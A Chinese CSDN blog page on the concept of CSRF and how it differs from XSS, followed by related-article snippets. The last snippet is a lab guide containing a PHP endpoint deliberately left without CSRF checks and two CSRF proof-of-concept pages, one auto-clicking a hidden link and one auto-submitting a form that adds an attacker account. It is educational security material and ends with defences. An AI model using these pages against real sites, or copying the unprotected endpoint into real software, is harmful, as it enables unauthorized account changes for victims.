实验33:csrf漏洞概述及原理

最新推荐文章于 2024-05-23 00:17:34 发布
最新推荐文章于 2024-05-23 00:17:34 发布
阅读量330 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: 作业
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_44720671/article/details/89666952
本文深入解析CSRF(跨站请求伪造)漏洞的概念与原理,阐述了在用户已登录的情况下,如何通过伪造请求来修改用户信息,揭示了CSRF攻击成功的两大关键因素,并对比了其与XSS的区别。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

csrf漏洞概述及原理

csrf全称为:Cross-site request forgery

在这里插入图片描述
正常情况下,某人A想要修改自己的个人信息,需要登录(得到权限),再点击提交(修改请求),这样就完成了修改。
若另一个人B想要修改A的个人信息,就需要有A的权限,可以将修改个人信息的请求进行修饰,引诱A在登录状态下点击,攻击成功!
成功原因:
1、该网站没有进行防CSRF漏洞处理,导致请求容易被伪造。
因此,一个网站是否存在CSRF漏洞,就要看其的换件信息是否容易被伪造。

2、A在登录状态下点击了链接

与xss的区别

在这里插入图片描述
在这里插入图片描述
判断一个网站是否存在漏洞
在这里插入图片描述
在这里插入图片描述

csrf实验
weixin_33708432的博客
06-22 562
CSRF攻击实验 CSRF攻击涉及用户受害者,受信任的网站和恶意网站。当受害者与受信任的站点拥有一个活跃的会话同时,如果访问恶意网站,恶意网站会注入一个HTTP请求到为受信任的站点,从而破话用户的信息。 CSRF 攻击总是涉及到三个角色:信赖的网站(Collabtive)、受害者的 session 或 cookie 以及一个恶意网站。受害...
CSRF漏洞实验报告
cxrpty的博客
02-25 2012
实验环境:DVWA、Apache 实验原理CSRF漏洞是因为web应用程序在用户进行敏感操作时,如修改账号密码、添加账号、转账等,没有校验表单token或者http请求头中的referer值,从而导致恶意攻击者利用普通用户的身份(cookie)完成攻击行为 实验内容: 实验一:修改密码(低级别DVWA) 1.构造一个网址:http://192.168.1.101/1.html ht...
Csrf漏洞概述及其原理
gl620321的博客
05-01 7182
一.Csrf漏洞概述 1.CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装成受信任用户的请求来利用受信任的网站。与XSS攻击相比,C...
CSRF漏洞
随 风
10-28 365
一、csrf(Cross-site request forgery)介绍 (1)csrf概念 跨站请求伪造,是指利用受害者尚未失效的身份信息(cookie,会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不是情的情况下以受害人的身份向服务器发送请求,从而完成非法操作; (2)csrf与xss区别 csrf属于业务逻辑漏洞,在服务器看来,所有请求都是合法的;csrf是服务器信任客户(经过身份验证的); xss属于技术漏洞;是客户信任服务器 (3)csfr利用方法 3.htmlcsrf 抓包利用
CSRF 攻击实验:无防御措施的 CSRF 漏洞
Flag少侠的博客
05-14 2103
CSRF(Cross-Site Request Forgery),也称为XSRF,是一种安全漏洞,攻击者通过欺骗用户在受信任网站上执行非自愿的操作,以实现未经授权的请求。CSRF攻击利用了网站对用户提交的请求缺乏充分验证和防范的弱点。攻击者通常通过在受信任网站上构造恶意的请求链接或提交表单,然后诱使用户点击该链接或访问包含恶意表单的页面。当用户执行了这些操作时,网站会自动发送请求,包含用户的身份验证信息,而用户并不知情。在这个示例中,攻击者可能在自己的网站上构造一个页面,包含上述代码。
pikachu--CSRF实验演练
m0_54024658的博客
06-18 532
CSRF概述 Cross-site request forgery 简称为“CSRF”,中文名称==跨站请求伪造==在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。 很多人搞不清楚CSRF的概念,甚至有时候会将其和XSS混淆,更有甚者会将其和越权问题混为一谈,这都是对原理没搞清楚导致的。 CSRF与XSS的区别 CSRF是借用户的权限完成攻击,攻击者并没有拿到用户的
【第九周】通过csrf(get)进行地址修改实验演示、token详解及常见防范措施、远程命令、代码执行漏洞原理及案例演示 等等
weixin_44722125的博客
05-05 627
通过csrf(get)进行地址修改实验演示 先登陆一下 修改地址 submit即可修改 如何确认此处是否存在CSRF漏洞 首先这是一个敏感信息修改,其次看下burp数据包 GET /pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=12345678922&add=shenyang&email=...
Elgg 系统 CSRF 攻击实验-内含源码以及设计说明书(可以自己运行复现).zip
05-08
这个实验的目的是帮助学习者理解 CSRF 攻击的原理,并通过实际操作来复现这种攻击。 **什么是 CSRF 攻击?** CSRF 是一种恶意攻击方式,攻击者利用用户已登录的身份,诱使用户在不知情的情况下执行非预期的操作。...
【编译原理实验项目漏洞扫描】:确保代码质量和安全性的最佳实践
![【编译原理实验项目漏洞扫描】:确保代码质量和安全性的最佳实践]...紧接着,文中探讨了漏洞扫描在编译原理实验项目中的应用,以及如何将安全实践融入实
【XSS & CSRF 】泄露cookie——以DVWA-High为例
Mr_Fmnwon的博客
05-23 2156
综合利用XSS以及CSRF实现Cookie的泄露,,,旅程比较曲折跨站脚本攻击XSS(最全最细致的靶场实战)_xss靶场-优快云博客网站中包含大量的动态内容以提高用户体验,比过去要复杂得多。所谓动态内容,就是根据用户环境和需要,Web应用程序能够输出相应的内容。
Web安全第三次实验(CSRF,XSS,点击劫持).rar
12-26
抱歉,xss那里修改了下,原来打算直接弹窗的,但上过课以后发现,可以使用ajax的同步发送获取到responseText,再从responseText中剪切出token,这样不会弹窗,并且使用了同步请求,不需要alert特地暂停等待操作完成。还有里面保存了修改后的myzoo文件。
CSRF检测工具
12-09
CSRFTester是一款CSRF检测工具 .
CSRF漏洞原理、DVWA实验、修复建议)
coderge's 优快云 Blog.
09-20 3849
目录 1 介绍CSRF漏洞 2 CSRF漏洞原理 3 DVWA CSRF实验过程 3.1 low级别 3.2 medium级别 相关函数说明 3.3 high级别 3.4 impossible级别 4 CSRF漏洞修复建议 1 介绍CSRF漏洞 CSRF (Cross -site request forgery,跨站请求伪造)也被称为One Click Attack或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS)
CSRF漏洞检测与发现
weixin_39811856的博客
05-17 2815
1.首先明白什么是CSRF漏洞 跨站请求伪造,这里刚入门的同学肯定不明白是什么意思,其实重点在于请求伪造 简单地说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作(如发邮件、发消息、甚至财产操作:转账、购买商品等)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去执行。这利用了web中用户身份认证的一个漏洞:简单的身份验证只能保证请求发自某个用户的浏览器,却不能保证请求本身是用户自愿发出的。 在CSRF的攻击场景中攻击者会伪造一个请求(这个请.
csrf漏洞实例分析
明哥哥知识分享
08-31 1144
1. 什么是csrf漏洞? 其实说白了,csrf漏洞的成因就是网站的cookie在浏览器中不会过期,只要不关闭浏览器或者退出登录,那以后只要是访问这个网站,都会默认你已经登录的状态。而在这个期间,攻击者发送了构造好的csrf脚本或包含csrf脚本的链接,可能会执行一些用户不想做的功能(比如是添加账号等)。这个操作不是用户真正想要执行的。 2. csrf漏洞危害 攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品,虚拟货币转账…[外链
SeedLabs-Web安全-CSRF实验
Anonymity
06-23 3341
SeedLabs-Web安全-CSRF实验 文章目录SeedLabs-Web安全-CSRF实验前言一、Task1 熟悉SQL语句1. 观察HTTP请求2.使用基本的SQL语句二、Task2 SQL注入攻击之select2.1 网页SQL注入攻击。2.2 来自命令行的SQL注入攻击。2.3 添加一条新的SQL语句。三、SQL注入攻击之UPDATE3.1 修改自己的薪水。3.2 修改他人工资四、Countermeasure — Prepared Statement 前言 CSRF注入的实验记录 提示:以
CSRF实验演示
北冥有鱼
04-29 1174
我们来到pikachu 我们先登陆一下lucy 帮她改个住址玩玩 我们可以在burp上看到我们刚刚抓得到get请求 我们能发现这个get请求是向后台发送了所有的参数 所以我们可以根据上次讲的小黑的思路,把地址改成66666,发给lucy 把地址补全 那么现在假如lucy在登陆态访问了这个链接 我们发现,这个地址就被改过来了 刷新以后的页面 因为这是get型的请求,所以这是get型的...
CSRF攻击实验 ——合天网安实验室学习笔记
weixin_42582241的博客
02-27 2517
实验链接 本实验以PHP和Mysql为环境,展示了CSRF攻击的原理和攻击过程。通过实验结果结合对攻击代码的分析,可更直观清晰地认识到Web安全里这种常见的攻击方式。 链接:http://www.hetianlab.com/expc.do?ce=5984201a-5b7e-42c2-959b-6e4cdfdb932c 实验简介 实验所属系列:web攻防 实验对象:本科/专科信息安全专业 实验类别:...
测试中遇到的CSRF
Bul1et的博客
12-06 648
昨天一个测试人员给我说让我复现一个漏洞CSRF 我给他要测试账号他说不用,他给我说的原话是这样 "改了refere之后,系统依旧接收信息说明具备CSRF呀" 以前也没遇到过这种。他说是我就照着复现喽  前面改一下host地址为test.com可以证明存在http头攻击 这次改refere存在CSRF  ...
跨站请求伪造CSRF实验
最新发布
04-03
### 关于跨站请求伪造(CSRF实验的设计与实施 #### 实验目标 通过设计并执行一个简单的 CSRF 攻击场景,验证攻击的工作原理以及其可能带来的危害。这有助于理解 CSRF 的本质及其防御方法。 --- #### 实验环境准备 1. **本地开发服务器** 使用 Web 开发框架搭建一个支持用户登录功能的小型应用,例如 PHP 或 Python Flask 应用程序。该应用程序应允许修改用户的某些敏感数据(如密码),以便模拟真实世界中的业务逻辑。 2. **易受攻击的功能模块** 创建一个未加防护的 URL 接口用于更新用户密码或其他操作。例如: ```php <?php session_start(); if ($_SERVER['REQUEST_METHOD'] === 'GET') { $new_password = $_GET['password_new']; $confirm_password = $_GET['password_conf']; if ($new_password && $confirm_password && $new_password === $confirm_password) { echo "Password updated successfully!"; // Simulate password update logic here. } else { echo "Error updating password."; } } ?> ``` 3. **恶意页面构建** 构建一个 HTML 页面,其中包含能够触发 CSRF 攻击的内容。此页面可以通过诱导受害者访问来完成攻击过程。 --- #### 实现步骤 ##### 方法一:基于 GET 请求的 CSRF 测试 创建一个 HTML 文件,在文件中嵌入超链接或自动加载脚本以发起 CSRF 请求: ```html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>CSRF Test</title> </head> <body> <!-- 隐蔽的超链接 --> <a href="http://localhost/csrf_vulnerable_app/change_password.php?password_new=hacked&password_conf=hacked" style="display:none;" id="csrf-link"></a> <!-- 自动点击链接 --> <script> document.getElementById('csrf-link').click(); </script> </body> </html> ``` 上述代码会在用户打开页面时立即发送一个 GET 请求到指定的目标地址[^4]。 ##### 方法二:基于 POST 请求的 CSRF 测试 如果目标接口仅接受 POST 请求,则可通过 `<form>` 表单提交方式实现 CSRF 攻击: ```html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>CSRF Form Attack</title> </head> <body onload="document.forms[0].submit()"> <form action="http://localhost/csrf_vulnerable_app/update_user.php" method="POST"> <input type="hidden" name="act" value="add"/> <input type="hidden" name="username" value="attacker"/> <input type="hidden" name="password" value="hackedpass"/> <input type="hidden" name="password2" value="hackedpass"/> <input type="hidden" name="button" value="%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7"/> <input type="hidden" name="userid" value="0"/> </form> </body> </html> ``` 当受害者浏览这个恶意页面时,浏览器会自动向目标站点提交表单数据[^3]。 --- #### 安全测试注意事项 在实际环境中进行此类测试前需获得授权,以免触犯法律。此外,建议使用虚拟机隔离测试网络,防止意外影响其他系统资源。 --- #### 防御措施概述 为了有效抵御 CSRF 攻击,可采取以下策略之一或多组合使用: - 添加一次性令牌(Token)校验机制; - 设置严格的 Referer 和 Origin 头部检查; - 启用 SameSite Cookie 属性限制第三方调用行为[^1]。 --- ### 结论 通过对 CSRF 漏洞的学习和实践,可以更深刻认识到这类威胁的存在形式及潜在风险,并掌握相应的缓解手段。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值